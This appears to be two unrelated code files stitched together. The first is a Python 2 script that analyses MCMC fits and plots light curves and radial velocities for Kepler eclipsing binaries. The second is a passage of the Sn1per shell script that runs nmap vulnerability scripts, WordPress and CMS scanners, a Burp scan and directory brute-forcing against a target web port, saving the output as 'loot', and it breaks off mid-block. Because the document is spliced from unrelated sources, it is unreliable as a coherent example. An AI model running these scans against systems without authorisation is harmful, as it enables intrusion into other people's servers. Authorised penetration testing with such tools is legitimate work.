print("Time elapsed since niter={0}:{1}".format(sampler.iterations,
time.time()-start_time))
print("Total time elapsed for MCMC run:{0}".format(time.time()-start_time))
print("Total acceptance fraction:{0}".format(np.mean(sampler.acceptance_fraction)))
try:
print("Total autocorr time:{0}".format(np.mean(sampler.acor)))
except:
print("Could not compute autocorr time...")
burnin=None
data=np.loadtxt(mcfile)
isonames = parnames_dict['lcrv']
blob_names=None
iwalker = np.arange(nwalkers)
afrac = np.empty((data.shape[0]/nwalkers, nwalkers))
logli = afrac*0.
params = np.empty((data.shape[0]/nwalkers, nwalkers, len(isonames)))
strays = []
for jj in iwalker:
afrac[:,jj] = data[jj::nwalkers,2]
logli[:,jj] = data[jj::nwalkers,3]
if len(afrac[:,jj][(afrac[:,jj]<0.1)])>=0.66*len(afrac[:,jj]):
strays.append(jj)
for ii in range(len(isonames)):
params[:, jj, ii] = data[jj::nwalkers, ii+4]
mostlike = np.where(logli == np.nanmax(logli))
mlpars = params[:,:,:][mostlike][0]
print "Max likelihood out of all samples: ", logli[:,:][mostlike]
for kk in range(len(isonames)):
print("""{0} = {1}""".format(str(isonames[kk]), mlpars[kk]))
if burnin is None:
print "Burn-in = when logli first crosses median value"
burnin = np.where(np.nanmedian(logli, axis=1) >= np.nanmean(logli))[0][0] * 10
_, bad_walkers, walker_percentiles = get_stray_walkers(params, nwalkers, ndim, burnin=burnin)
strays = iwalker[bad_walkers>1]
print("{} bad/stray walkers = {}".format(len(strays), strays))
keep = iwalker[~np.in1d(iwalker, strays)]
if len(strays)>=0.33*nwalkers:
keep = iwalker
fig = plt.figure(figsize=(16, 16))
for ii in range(len(isonames)):
ax = fig.add_subplot(int(len(isonames)/2)+1, 2, ii+1)
ax.plot(params[:, :, ii])
ax.plot(np.nanmean(params[:,:,ii].T, axis=0), 'k-', lw=2, alpha=0.2)
ax.plot([burnin, burnin], plt.ylim(), 'y-', lw=2.0)
ax.set_xlabel('N/10 iteration')
ax.set_ylabel(isonames[ii])
divider = make_axes_locatable(ax)
axhist = divider.append_axes("right", size=1.2, pad=0.1, sharey=ax)
axhist.hist(params[:,:,ii], 100, histtype='step', alpha=0.6, normed=True,
orientation='horizontal')
axhist.hist(params[:,:,ii].ravel(), 100, histtype='step', color='k',
normed=True, orientation='horizontal')
plt.setp(axhist.get_yticklabels(), visible=False)
ax = fig.add_subplot(int(len(isonames)/2)+1, 2, len(isonames)+1)
ax.plot(logli)
ax.axvline(burnin, color='y', lw=2.0)
ax.set_xlabel('N/10 iteration')
ax.set_ylabel('logL')
plt.suptitle("KIC {} Parameter Trace".format(keblat.kic))
plt.savefig(header+footer+'_parameters.png')
bfpars = map(lambda v: (v[1], v[2]-v[1], v[1]-v[0]),
zip(*np.nanpercentile(params[burnin:,keep,:].reshape((-1, ndim)),
[16, 50, 84], axis=0)))
try:
blobpars = map(lambda v: (v[1], v[2]-v[1], v[1]-v[0]),
zip(*np.nanpercentile(blobs[burnin:,keep,:].reshape((-1, len(blob_names))),
[16, 50, 84], axis=0)))
except:
print("No blobs.")
print("MCMC result: ")
print("Accep. Frac = ", np.mean(afrac[burnin:, keep]))
bffile = open(header+footer+'mcmc.pars', "w")
bffile.write("""{}\n""".format(" ".join([str(mp) for mp in mlpars])))
for kk in range(len(isonames)):
print("""{0} = {1[0]} +{1[1]} -{1[2]}""".format(str(isonames[kk]),
bfpars[kk]))
bffile.write("""#{0} = {1[0]} +{1[1]} -{1[2]}\n""".format(str(isonames[kk]),
bfpars[kk]))
changeofvar_names = ['m1', 'm2', 'r1', 'r2', 'inc', 'e']
params_changeofvar = np.zeros((params.shape[0], params.shape[1], len(changeofvar_names)))
params_changeofvar[:,:,0], params_changeofvar[:,:,1] = keblat.sumrat_to_12(params[:,:,0], params[:,:,1])
params_changeofvar[:,:,2], params_changeofvar[:,:,3] = keblat.sumrat_to_12(params[:,:,2], params[:,:,3])
params_changeofvar[:,:,4] = keblat.get_inc(params[:,:,8], params_changeofvar[:,:,2], keblat.get_a(params[:,:,4], params[:,:,0]))
params_changeofvar[:,:,5] = np.sqrt(params[:,:,6]**2 + params[:,:,7]**2)
bfpars_changeofvar = map(lambda v: (v[1], v[2]-v[1], v[1]-v[0]),
zip(*np.percentile(params_changeofvar.reshape((-1, len(changeofvar_names))),
[16, 50, 84], axis=0)))
for kk in range(len(changeofvar_names)):
print("""{0} = {1[0]} +{1[1]} -{1[2]}""".format(str(changeofvar_names[kk]),
bfpars_changeofvar[kk]))
bffile.write("""#{0} = {1[0]} +{1[1]} -{1[2]}\n""".format(str(changeofvar_names[kk]),
bfpars_changeofvar[kk]))
bffile.close()
mlpars[[-1, -3]] = np.exp(mlpars[[-1, -3]])
keblat.plot_lcrv(mlpars, header+footer, '', savefig=True, thresh=12., retro=retro)
plt.savefig(header+footer+'.eps')
np.savetxt(header+footer+'.crowd', crowd)
import corner
plt.figure(figsize=(16, 16))
thin_by = np.clip((params.shape[0]-burnin)*params.shape[1]/50000, 1, 50000)
print("burned-in param matrix is {}; thinning by {}".format(params[burnin:, :, :].shape, thin_by))
post_inds = np.arange(len(isonames))
post_inds = np.delete(post_inds, np.where(np.nanstd(params[burnin::thin_by, :, :], axis=(0,1)) < 1e-12)[0])
try:
corner.corner(params[burnin::thin_by, keep, :][:,:,post_inds].reshape((-1, len(post_inds))),
labels=np.array(isonames)[post_inds], quantiles=[0.16, 0.5, 0.84],
show_titles=True, title_kwargs={"fontsize": 11})
plt.suptitle("KIC {}".format(keblat.kic))
plt.savefig(header+footer+'_posteriors.png')
except Exception, e:
print(str(e), post_inds)
print "Making ACF plots now."
c=5
tau = np.zeros((ndim))
fig = plt.figure(figsize=(16, 16))
fig.subplots_adjust(hspace=0.0)
x = np.arange(params.shape[0])
for ii in range(ndim):
ax = fig.add_subplot(ndim/3+1, 3, ii+1)
print("{}".format(isonames[ii]))
tau[ii], mean_of_acfs, acf = get_acf_tau(params[:, keep, ii], c=c)
ax.plot(acf, alpha=0.5)
ax.plot(mean_of_acfs, 'k-', lw=1.5, alpha=0.8, label='mean(acfs)')
ax.text(tau[ii]*1.1, 0.8, '{}'.format(int(tau[ii])))
ax.plot(x, np.exp(-x/tau[ii]), '-', lw=1.5, alpha=0.8)
ax.set_xlabel('N/10 iteration lag')
ax.set_ylabel('{}'.format(isonames[ii]))
plt.suptitle("KIC {} ACF".format(keblat.kic))
plt.savefig(header+footer+'_ACF.png')
#################### CODE for KIC 6864859 heartbeat star #####################
mod,poly = keblat.jd*0., keblat.jd*0.
mod[keblat.clip],poly[keblat.clip] = keblat.lcfit(lcpars[:13], keblat.jd[keblat.clip], keblat.quarter[keblat.clip],
keblat.flux[keblat.clip], keblat.dflux[keblat.clip], keblat.crowd[keblat.clip],
polyorder=2)
for ii in range(9):
plt.subplot(3, 3, ii+1)
clip = (keblat.jd >= (keblat.tpe+keblat.period*ii - 2*keblat.pwidth*keblat.period)) * \
(keblat.jd <= (keblat.tse +keblat.period*ii+ 2.*keblat.swidth*keblat.period)) * (keblat.quality<2)
# mod,poly = keblat.lcfit(lcpars[:13], keblat.jd[clip], keblat.quarter[clip],
# keblat.flux[clip], keblat.dflux[clip], keblat.crowd[clip],
# polyorder=1, ooe=False)
plt.plot(keblat.jd[clip], keblat.flux[clip], '.')
plt.plot(keblat.jd[clip*keblat.clip], (mod*poly)[keblat.clip * clip], '-')
#plt.ylim((0.999, 1.001))
_Ncad = int(np.ceil((keblat.tse + 2*keblat.swidth*keblat.period -
keblat.tpe - 2*keblat.pwidth*keblat.period) / (0.0204)))
_Neclipses = int(np.ceil((keblat.jd[-1]-keblat.jd[0])/period))+1
_tgrid = np.arange(keblat.tpe - 2*keblat.pwidth*keblat.period,
keblat.tse + 2.1*keblat.swidth*keblat.period, 0.0204)
for ii in range(_Neclipses)[1:]:
_tgrid = np.vstack((_tgrid,
np.arange(keblat.tpe+keblat.period*ii - 2*keblat.pwidth*keblat.period,
keblat.tse+keblat.period*ii + 2.1*keblat.swidth*keblat.period, 0.0204)))
_fgrid = _tgrid.copy()*np.nan
for ii in range(_Neclipses):
# clip = (keblat.jd >= (keblat.tpe+keblat.period*ii - 1.2*keblat.pwidth*keblat.period)) * (keblat.jd <= (keblat.tse +keblat.period*ii + 1.2*keblat.swidth*keblat.period))
clip = ((abs(keblat.jd-(keblat.tpe+keblat.period*ii))<2*keblat.pwidth*keblat.period) | (abs(keblat.jd-(keblat.tse +keblat.period*ii))<2*keblat.swidth*keblat.period)) * (keblat.quality<2)
mod,poly = keblat.lcfit(lcpars[:13], keblat.jd[clip], keblat.quarter[clip],
keblat.flux[clip], keblat.dflux[clip], keblat.crowd[clip],
polyorder=1)
linfit = np.poly1d(np.polyfit(keblat.jd[clip][mod>0.999], keblat.flux[clip][mod>0.999], 1))
# _fgrid[ii,:] = np.interp(_tgrid[ii,:], keblat.jd[~clip * (keblat.quality<2)], keblat.flux[~clip * (keblat.quality<2)] / linfit(keblat.jd[~clip * (keblat.quality<2)]))
_fgrid[ii,:] = np.interp(_tgrid[ii,:], keblat.jd[(keblat.quality<2)], keblat.flux[(keblat.quality<2)] / linfit(keblat.jd[(keblat.quality<2)]))
gap = np.where(np.diff(keblat.jd[(keblat.quality<2)])>7.*0.0204)[0]
bad = np.zeros(_tgrid.shape[0]*_tgrid.shape[1]).astype(bool)
for ii in range(len(gap)-1):
bad = bad | ((_tgrid.ravel()>=keblat.jd[keblat.quality<2][gap[ii]]) * (_tgrid.ravel()<=keblat.jd[keblat.quality<2][gap[ii]+1]))
bad = bad.reshape((_tgrid.shape[0], _tgrid.shape[1]))
plt.figure(figsize=(8,5))
for ii in np.arange(_Neclipses)[~bad_eclipses]:
good = ~(bad[ii,:] | np.append((np.diff(_fgrid[ii,:])==0), True))
phase = ((_tgrid[ii,:][good])-keblat.tpe)%keblat.period/keblat.period
phase[phase>0.8]-=1.
plt.plot(phase, _fgrid[ii,:][good]+ii*0.0001, '.')
phase_peri = ((keblat.tpe - keblat.sudarsky(np.pi/2. - omega, e, period)) - keblat.tpe) % keblat.period/keblat.period
plt.axvline(phase_peri, linestyle='-', lw=2, alpha=0.7, color='0.1')
plt.text(0.001, 1.0035, '$\mathrm{PE}$', va='center', ha='center', rotation=35, fontsize=11)
plt.text(0.125, 1.0035, '$\mathrm{SE}$', va='center', ha='center', rotation=35, fontsize=11)
plt.text(phase_peri+0.001, 0.9997, '$\mathrm{periastron}$', fontsize=11)
plt.xlim((min(phase), max(phase)))
plt.ylim((0.9994, 1.004))
plt.xlabel('$\mathrm{Phase\ (P=40.8778\ d)}$')
plt.ylabel('$\mathrm{Offset Flux}$')
plt.title('$\mathrm{Eccentric\ Eclipsing\ System\ KIC\ 6864859}$')
#################### little snippet of code for cauldron on kic 6449 ####################
opt_lcrvpars = np.loadtxt(prefix_in+'lcrv_mass1.0_fix.lmfit')
keblat.plot_lcrv(opt_lcrvpars, prefix, savefig=False)
lcpars = [keblat.pars[zz] for zz in parnames_dict['lc']]
rvpars_case1 = [keblat.pars[zz] for zz in parnames_dict['rv']]
rv1_case1, rv2_case1 = keblat.rvfit(rvpars_case1, keblat.rv_t)
opt_lcrvpars = np.loadtxt(prefix_in+'lcrv_mass4.9_fix.lmfit')
keblat.plot_lcrv(opt_lcrvpars, prefix, savefig=False)
lcpars2 = [keblat.pars[zz] for zz in parnames_dict['lc']]
rvpars_case2 = [keblat.pars[zz] for zz in parnames_dict['rv']]
rv1_case2, rv2_case2 = keblat.rvfit(rvpars_case2, keblat.rv_t)
opt_lcrvpars = np.loadtxt(prefix_in+'lcrv_mass2.5_fix.lmfit')
keblat.plot_lcrv(opt_lcrvpars, prefix, savefig=False)
lcpars3 = [keblat.pars[zz] for zz in parnames_dict['lc']]
rvpars_case3 = [keblat.pars[zz] for zz in parnames_dict['rv']]
rv1_case3, rv2_case3 = keblat.rvfit(rvpars_case3, keblat.rv_t)
timestamps = np.array([2456557.73275, 2456559.72268, 2456584.63158, 2456585.63008,
2456757.89224, 2456760.90501, 2456761.87212, 2456763.88043,
2456784.82126, 2456786.79775, 2456787.80865, 2456815.78483,
2456816.76558, 2456818.76389, 2456819.76152])
timestamps -= 2454833.
## load bfouts per visit ##
bfout = []
for ii in range(15):
bfout.append(np.loadtxt('data/6449358BFOut_{}.txt'.format(ii+1)))
bfout = np.array(bfout)
bcv = np.loadtxt('data/6449358_bcv.txt')
fig=plt.figure()
for ii in range(15):
ax = fig.add_subplot(4,4,ii+1)
ax.plot(bfout[ii, :, 0], bfout[ii, :, 1])
ax.text(-244, -0.016, r'$\phi$='+str((timestamps[ii]-keblat.tpe)%keblat.period/keblat.period)[:5])
ax.set_xlim((-250, 250))
ax.axvline(rv2_case1[ii]*1e-3-bcv[ii,1], color='green', ls='--',
label=str(np.round(rvpars_case1[0], 1))+', '+str(np.round(rvpars_case1[1], 2)))
ax.axvline(rv2_case3[ii]*1e-3-bcv[ii,1], color='orange', ls='--',
label=str(np.round(rvpars_case3[0], 1)) +', '+str(np.round(rvpars_case3[1], 2)))
ax.axvline(rv2_case2[ii]*1e-3-bcv[ii,1], color='red', ls='--',
label=str(np.round(rvpars_case2[0], 1)) +', '+str(np.round(rvpars_case2[1], 2)))
fig.text(0.5, 0.04, 'Uncorrected Radial Velocity (km s$^{-1}$)', ha='center')
fig.text(0.04, 0.5, 'Broadening Function', va='center', rotation='vertical')
plt.legend(loc='upper left')
|
# WEBPORTHTTP MODE #####################################################################################################
if [ "$MODE" = "webporthttp" ]; then
if [ "$REPORT" = "1" ]; then
if [ ! -z "$WORKSPACE" ]; then
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
echo "$TARGET $MODE port$PORT `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[https://xerosecurity.com"
echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz"
echo -e ""
echo -e ""
echo -e " ; , "
echo -e " ,; '. "
echo -e " ;: :; "
echo -e " :: :: "
echo -e " :: :: "
echo -e " ': : "
echo -e " :. : "
echo -e " ;' :: :: ' "
echo -e " .' '; ;' '. "
echo -e " :: :; ;: :: "
echo -e " ; :;. ,;: :: "
echo -e " :; :;: ,;\" :: "
echo -e " ::. ':; ..,.; ;:' ,.;: "
echo -e " \"'\"... '::,::::: ;: .;.;\"\"' "
echo -e " '\"\"\"....;:::::;,;.;\"\"\" "
echo -e " .:::.....'\"':::::::'\",...;::::;. "
echo -e " ;:' '\"\"'\"\";.,;:::::;.'\"\"\"\"\"\" ':; "
echo -e " ::' ;::;:::;::.. :; "
echo -e " :: ,;:::::::::::;:.. :: "
echo -e " ;' ,;;:;::::::::::::::;\";.. ':."
echo -e " :: ;:\" ::::::\"\"\"':::::: \": ::"
echo -e " :. :: ::::::; ::::::: : ; "
echo -e " ; :: ::::::: ::::::: : ; "
echo -e " ' :: ::::::....:::::' ,: ' "
echo -e " ' :: :::::::::::::\" :: "
echo -e " :: ':::::::::\"' :: "
echo -e " ': \"\"\"\"\"\"\"' :: "
echo -e " :: ;: "
echo -e " ':; ;:\" "
echo -e " -hrr- '; ,;' "
echo -e " \"' '\" "
echo -e " ''''$RESET"
echo ""
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -sV -Pn -p $PORT --open $TARGET -oX $LOOT_DIR/nmap/nmap-http-$TARGET.xml
port_http=`grep 'portid="'$PORT'"' $LOOT_DIR/nmap/nmap-http-$TARGET.xml | grep open`
if [ -z "$port_http" ]; then
echo -e "$OKRED + -- --=[Port $PORT closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port $PORT opened... running tests...$RESET"
if [ "$WAFWOOF" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING FOR WAF $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wafw00f http://$TARGET:$PORT | tee $LOOT_DIR/web/waf-$TARGET-http-port$PORT.txt 2> /dev/null
echo ""
fi
if [ "$WHATWEB" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING HTTP INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
whatweb -a 3 http://$TARGET:$PORT | tee $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw > $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw 2> /dev/null
echo ""
fi
if [ "$WIG" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING SERVER INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/wig/wig.py -d -q http://$TARGET:$PORT | tee $LOOT_DIR/web/wig-$TARGET-http-$PORT
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-http-$PORT > $LOOT_DIR/web/wig-$TARGET-http-$PORT.txt 2> /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 3 -I -s -R http://$TARGET:$PORT | tee $LOOT_DIR/web/headers-http-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 -I -s -R -L http://$TARGET:$PORT | tee $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS http://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
if [ "$WEBTECH" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
webtech -u http://$TARGET:$PORT | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-http-port$PORT.txt
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-http-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-http-$TARGET-$PORT.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ $CUTYCAPT = "1" ]; then
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
fi
fi
if [ $WEBSCREENSHOT = "1" ]; then
cd $LOOT_DIR
python $INSTALL_DIR/bin/webscreenshot.py -t 5 http://$TARGET:$PORT
fi
if [ "$BURP_SCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:$PORT\"]}\"$RESET"
fi
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:$PORT\"]}"
echo ""
fi
if [ "$NMAP_SCRIPTS" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -A -Pn -T5 -p $PORT -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port$PORT
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null
fi
if [ "$PASSIVE_SPIDER" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
fi
if [ "$WAYBACKMACHINE" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
fi
if [ "$BLACKWIDOW" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u http://$TARGET:$PORT -l 3 -s y -v n 2> /dev/null
cat /usr/share/blackwidow/$TARGET*/$TARGET*.txt 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e $WEB_BRUTE_EXTENSIONS -f -r -t $THREADS --random-agents
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-common.txt
fi
fi
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-full.txt
fi
fi
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$DIRSEARCH" == "1" ]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
fi
if [ "$GOBUSTER" == "1" ]; then
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-exploits.txt
fi
fi
if [ "$DIRSEARCH" == "1" ]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
if [ "$GOBUSTER" == "1" ]; then
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
wget http://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-http.txt 2> /dev/null
if [ "$CLUSTERD" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET -p $PORT | tee $LOOT_DIR/web/clusterd-$TARGET-port$PORT.txt
fi
if [ "$CMSMAP" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cmsmap http://$TARGET:$PORT | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTa.txt
echo ""
cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTb.txt
echo ""
fi
if [ "$WPSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wpscan --url http://$TARGET:$PORT --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.txt
echo ""
wpscan --url http://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.txt
echo ""
fi
if [ "$NIKTO" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
